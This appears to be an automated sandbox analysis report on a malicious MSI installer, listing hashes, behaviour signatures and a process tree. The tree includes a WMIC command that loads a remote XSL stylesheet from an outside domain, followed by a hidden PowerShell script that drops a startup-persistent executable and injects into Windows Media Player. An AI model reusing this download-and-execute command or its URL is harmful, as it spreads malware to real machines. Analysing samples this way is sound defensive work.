Overview
overview
10Static
static
8test/0b627...5b.doc
windows7_x64
10test/0b627...5b.doc
windows10_x64
10test/0dded...66.doc
windows7_x64
10test/0dded...66.doc
windows10_x64
10test/91B5D...9D.msi
windows7_x64
8test/91B5D...9D.msi
windows10_x64
10test/ed01e...aa.exe
windows7_x64
10test/ed01e...aa.exe
windows10_x64
10test/fe9d7...8f.exe
windows7_x64
10test/fe9d7...8f.exe
windows10_x64
10Analysis
-
max time kernel
80s -
max time network
137s -
platform
windows10_x64 -
resource
win10-en-20211104 -
submitted
02-12-2021 11:58
Static task
static1
Behavioral task
behavioral1
Sample
test/0b627b4eca9b9e8bd04a0d1a103876f6e0fa91049fd0b51bae9ae41acaacf15b.doc
Resource
win7-en-20211014
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
test/0b627b4eca9b9e8bd04a0d1a103876f6e0fa91049fd0b51bae9ae41acaacf15b.doc
Resource
win10-en-20211104
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral3
Sample
test/0dded430c1958ae0ec60c2d50ab99f562269ad1ee09db17606661bd55cd29c66.doc
Resource
win7-en-20211014
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral4
Sample
test/0dded430c1958ae0ec60c2d50ab99f562269ad1ee09db17606661bd55cd29c66.doc
Resource
win10-en-20211104
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral5
Sample
test/91B5DB3C0CCBD68BD04C24571E27F99D.msi
Resource
win7-en-20211014
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral6
Sample
test/91B5DB3C0CCBD68BD04C24571E27F99D.msi
Resource
win10-en-20211104
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral7
Sample
test/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
Resource
win7-en-20211014
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral8
Sample
test/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
Resource
win10-en-20211104
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral9
Sample
test/fe9d72dd4b046bafdd144902ab570297629f83d06afb5a9ba7703382a29d588f.exe
Resource
win7-en-20211104
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral10
Sample
test/fe9d72dd4b046bafdd144902ab570297629f83d06afb5a9ba7703382a29d588f.exe
Resource
win10-en-20211014
windows10_x64
0 signatures
0 seconds
General
-
Target
test/91B5DB3C0CCBD68BD04C24571E27F99D.msi
-
Size
277KB
-
MD5
91b5db3c0ccbd68bd04c24571e27f99d
-
SHA1
b01cb4fe38315d41fcbe9c6278ebe4574496ab0d
-
SHA256
ec85138598c57c6a6bdb5ed470614f582d3b5a8c6b243eb2f41b9970ea13d130
-
SHA512
9f0b07f961625fcc06ee64fcfe5e35e0d40db81f75c3cbc584434c1925fac241db69cac3c1a1bf329d965a4df9bdaa53c13bb8ea3206e2c9d4facf7f74ba21b7
Score
10/10
Malware Config
Signatures
-
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
description pid Process procid_target PID 2628 created 4432 2628 WerFault.exe 80 -
Blocklisted process makes network request 4 IoCs
flow pid Process 12 736 MsiExec.exe 15 3788 WMIC.exe 17 976 MsiExec.exe 27 400 powershell.exe -
Executes dropped EXE 2 IoCs
pid Process 1400 lcE753.tmp 4752 nvsmartmaxapp.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nvsmartmaxapp.lnk powershell.exe -
Loads dropped DLL 6 IoCs
pid Process 976 MsiExec.exe 976 MsiExec.exe 976 MsiExec.exe 976 MsiExec.exe 4752 nvsmartmaxapp.exe 4432 wmplayer.exe -
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\R: msiexec.exe -
Drops file in Windows directory 11 IoCs
description ioc Process File opened for modification C:\Windows\Installer\f75ceca.msi msiexec.exe File opened for modification C:\Windows\Installer\MSIE0BD.tmp msiexec.exe File created C:\Windows\Installer\SourceHash{B7E63CAC-805B-4255-A63C-38D579B3EEAB} msiexec.exe File created C:\Windows\Installer\f75ceca.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSIDC67.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIE736.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIED04.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSIF16A.tmp msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
pid pid_target Process procid_target 2628 4432 WerFault.exe 80 -
Suspicious behavior: EnumeratesProcesses 19 IoCs
pid Process 400 powershell.exe 400 powershell.exe 400 powershell.exe 4336 msiexec.exe 4336 msiexec.exe 400 powershell.exe 2628 WerFault.exe 2628 WerFault.exe 2628 WerFault.exe 2628 WerFault.exe 2628 WerFault.exe 2628 WerFault.exe 2628 WerFault.exe 2628 WerFault.exe 2628 WerFault.exe 2628 WerFault.exe 2628 WerFault.exe 2628 WerFault.exe 2628 WerFault.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 1900 msiexec.exe Token: SeIncreaseQuotaPrivilege 1900 msiexec.exe Token: SeSecurityPrivilege 4336 msiexec.exe Token: SeCreateTokenPrivilege 1900 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 1900 msiexec.exe Token: SeLockMemoryPrivilege 1900 msiexec.exe Token: SeIncreaseQuotaPrivilege 1900 msiexec.exe Token: SeMachineAccountPrivilege 1900 msiexec.exe Token: SeTcbPrivilege 1900 msiexec.exe Token: SeSecurityPrivilege 1900 msiexec.exe Token: SeTakeOwnershipPrivilege 1900 msiexec.exe Token: SeLoadDriverPrivilege 1900 msiexec.exe Token: SeSystemProfilePrivilege 1900 msiexec.exe Token: SeSystemtimePrivilege 1900 msiexec.exe Token: SeProfSingleProcessPrivilege 1900 msiexec.exe Token: SeIncBasePriorityPrivilege 1900 msiexec.exe Token: SeCreatePagefilePrivilege 1900 msiexec.exe Token: SeCreatePermanentPrivilege 1900 msiexec.exe Token: SeBackupPrivilege 1900 msiexec.exe Token: SeRestorePrivilege 1900 msiexec.exe Token: SeShutdownPrivilege 1900 msiexec.exe Token: SeDebugPrivilege 1900 msiexec.exe Token: SeAuditPrivilege 1900 msiexec.exe Token: SeSystemEnvironmentPrivilege 1900 msiexec.exe Token: SeChangeNotifyPrivilege 1900 msiexec.exe Token: SeRemoteShutdownPrivilege 1900 msiexec.exe Token: SeUndockPrivilege 1900 msiexec.exe Token: SeSyncAgentPrivilege 1900 msiexec.exe Token: SeEnableDelegationPrivilege 1900 msiexec.exe Token: SeManageVolumePrivilege 1900 msiexec.exe Token: SeImpersonatePrivilege 1900 msiexec.exe Token: SeCreateGlobalPrivilege 1900 msiexec.exe Token: SeRestorePrivilege 4336 msiexec.exe Token: SeTakeOwnershipPrivilege 4336 msiexec.exe Token: SeRestorePrivilege 4336 msiexec.exe Token: SeTakeOwnershipPrivilege 4336 msiexec.exe Token: SeIncreaseQuotaPrivilege 3788 WMIC.exe Token: SeSecurityPrivilege 3788 WMIC.exe Token: SeTakeOwnershipPrivilege 3788 WMIC.exe Token: SeLoadDriverPrivilege 3788 WMIC.exe Token: SeSystemProfilePrivilege 3788 WMIC.exe Token: SeSystemtimePrivilege 3788 WMIC.exe Token: SeProfSingleProcessPrivilege 3788 WMIC.exe Token: SeIncBasePriorityPrivilege 3788 WMIC.exe Token: SeCreatePagefilePrivilege 3788 WMIC.exe Token: SeBackupPrivilege 3788 WMIC.exe Token: SeRestorePrivilege 3788 WMIC.exe Token: SeShutdownPrivilege 3788 WMIC.exe Token: SeDebugPrivilege 3788 WMIC.exe Token: SeSystemEnvironmentPrivilege 3788 WMIC.exe Token: SeRemoteShutdownPrivilege 3788 WMIC.exe Token: SeUndockPrivilege 3788 WMIC.exe Token: SeManageVolumePrivilege 3788 WMIC.exe Token: 33 3788 WMIC.exe Token: 34 3788 WMIC.exe Token: 35 3788 WMIC.exe Token: 36 3788 WMIC.exe Token: SeIncreaseQuotaPrivilege 3788 WMIC.exe Token: SeSecurityPrivilege 3788 WMIC.exe Token: SeTakeOwnershipPrivilege 3788 WMIC.exe Token: SeLoadDriverPrivilege 3788 WMIC.exe Token: SeSystemProfilePrivilege 3788 WMIC.exe Token: SeSystemtimePrivilege 3788 WMIC.exe Token: SeProfSingleProcessPrivilege 3788 WMIC.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 1900 msiexec.exe 1900 msiexec.exe -
Suspicious use of WriteProcessMemory 19 IoCs
description pid Process procid_target PID 4336 wrote to memory of 736 4336 msiexec.exe 71 PID 4336 wrote to memory of 736 4336 msiexec.exe 71 PID 736 wrote to memory of 3788 736 MsiExec.exe 72 PID 736 wrote to memory of 3788 736 MsiExec.exe 72 PID 4336 wrote to memory of 976 4336 msiexec.exe 74 PID 4336 wrote to memory of 976 4336 msiexec.exe 74 PID 4336 wrote to memory of 976 4336 msiexec.exe 74 PID 3788 wrote to memory of 400 3788 WMIC.exe 75 PID 3788 wrote to memory of 400 3788 WMIC.exe 75 PID 976 wrote to memory of 1400 976 MsiExec.exe 77 PID 976 wrote to memory of 1400 976 MsiExec.exe 77 PID 976 wrote to memory of 1400 976 MsiExec.exe 77 PID 400 wrote to memory of 4752 400 powershell.exe 79 PID 400 wrote to memory of 4752 400 powershell.exe 79 PID 400 wrote to memory of 4752 400 powershell.exe 79 PID 4752 wrote to memory of 4432 4752 nvsmartmaxapp.exe 80 PID 4752 wrote to memory of 4432 4752 nvsmartmaxapp.exe 80 PID 4752 wrote to memory of 4432 4752 nvsmartmaxapp.exe 80 PID 4752 wrote to memory of 4432 4752 nvsmartmaxapp.exe 80
Processes
-
C:\Windows\system32\msiexec.exemsiexec.exe /I C:\Users\Admin\AppData\Local\Temp\test\91B5DB3C0CCBD68BD04C24571E27F99D.msi1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1900
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4336 -
C:\Windows\System32\MsiExec.exeC:\Windows\System32\MsiExec.exe -Embedding 369A2A74B5610B57ACFDB182A068E1532⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:736 -
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" process get executablepath^,status /format:"http://barbosaoextra.com.br/dados/noticia/7/imagem/noar.xsl"3⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3788 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\Admin.ps1" -WindowStyle Hidden4⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:400 -
C:\Users\Admin\AppData\Roaming\HAOsGt\nvsmartmaxapp.exe"C:\Users\Admin\AppData\Roaming\HAOsGt\nvsmartmaxapp.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4752 -
C:\Program Files (x86)\Windows Media Player\wmplayer.exe"C:\Program Files (x86)\Windows Media Player\wmplayer.exe"6⤵
- Loads dropped DLL
PID:4432 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 6527⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious behavior: EnumeratesProcesses
PID:2628
-
-
-
-
-
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 90D938907D219777DA79E286130093792⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:976 -
C:\Users\Admin\AppData\Local\Temp\lcE753.tmp"C:\Users\Admin\AppData\Local\Temp\lcE753.tmp"3⤵
- Executes dropped EXE
PID:1400
-
-